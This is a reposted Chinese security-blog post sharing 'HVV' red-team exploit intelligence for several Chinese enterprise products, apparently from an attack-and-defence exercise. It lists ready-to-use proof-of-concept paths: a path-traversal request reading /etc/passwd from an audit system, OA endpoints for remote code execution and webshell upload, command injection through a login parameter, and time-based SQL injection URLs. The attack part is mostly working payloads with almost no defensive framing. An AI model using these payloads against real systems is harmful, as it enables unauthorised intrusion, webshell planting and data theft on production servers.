2023HVV情报共享-day1

admin 2023年8月10日01:19:43评论516 views字数 1305阅读4分21秒阅读模式
某服-应用交付管理系统-RCE(已复现)

漏洞路径:/rep/login

由于该登录接口的clsMode参数可控,可通过拼接n{cmd}n进行命令执行

2023HVV情报共享-day1

金山WPS-RCE
受害者打开攻击者精心构造的文档后,自动下载远程恶意脚本,执行代码命令,获取受害者主机权限

2023HVV情报共享-day1

某盟-sas安全审计系统-任意文件读取0day

验证POC:

/webconf/GetFile/index?path=../../../../../../../../../../../../../../etc/passwd

某远-OA-RCE

多个漏洞路径:

1、/seeyon/ajax.do?method=ajaxAction&managerName=syncConfigManager2、/seeyon/ajax.do?method=ajaxAction&managerName=syncConfigManager&requestCompress=gzip3、/seeyon/ajax.do?method=ajaxAction&managerName=syncConfigManager&requestCompress=gzip&managerMethod=checkDB&arguments=4、/seeyon/ajax.do?method=ajaxAction&managerName=syncConfigManager&managerMethod=checkDB&arguments=5、/seeyon/ajax.do?method=ajaxAction&managerName=syncConfigManager&managerMethod=&arguments

某凌-OA-RCE

通过文件上传-->解压-->获取webshell,前台漏洞

漏洞路径:

/api///sys/ui/sys_ui_extend/sysUiExtend.do

某达-OA-Sql注入

通过时间延迟获取数据库信息

验证POC1:

/general/system/seal_manage/dianju/delete_log.php?DELETE_STR=1)%20and%20(substr(DATABASE(),1,1))=char(84)%20and%20(select%20count(*)%20from%20information_schema.columns%20A,information_schema.columns%20B)%20and(1)=(1

验证POC2:

/general/system/seal_manage/iweboffice/delete_seal.php?DELETE_STR=1)%20and%20(substr(DATABASE(),1,1))=char(84)%20and%20(select%20count(*)%20from%20information_schema.columns%20A,information_schema.columns%20B)%20and(1)=(1

原文始发于微信公众号(极致攻防实验室):2023HVV情报共享-day1

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年8月10日01:19:43
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   2023HVV情报共享-day1http://cn-sec.com/archives/1945605.html

发表评论

匿名网友 填写信息